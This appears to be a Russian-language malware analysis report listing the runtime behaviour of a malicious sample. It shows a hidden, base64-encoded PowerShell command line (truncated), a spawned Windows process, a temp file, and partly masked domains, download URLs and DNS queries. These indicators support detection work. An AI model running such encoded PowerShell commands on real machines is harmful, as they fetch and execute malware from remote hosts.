Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABGAHgAZAB3AGQAbABxAHIAbQA9ACcAVABhAHUAZgBvAG8AcwBsACcAOwAkAEUAdQBjAHgAYwBrAGEAbgBxAHIAcABxACAAPQAgACcAMgAwADQAJwA7ACQAQgBvAHcAaQB3AHQAbwB3AG8AdwBxAHUAagA9ACc...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1616
- %TEMP%\801330.cvr
- 'rp###upltd.com':80
- 'lo###mart.com':80
- 'pl#####faccessories.eu':443
- 'gu###.###efscienceofficers.org':443
- http://rp###upltd.com/wp-snapshots/y7c3b/
- http://lo###mart.com/wp-includes/Qcl/
- 'pl#####faccessories.eu':443
- 'gu###.###efscienceofficers.org':443
- DNS ASK rp###upltd.com
- DNS ASK lo###mart.com
- DNS ASK va####ademonte.com
- DNS ASK pl#####faccessories.eu
- DNS ASK gu###.###efscienceofficers.org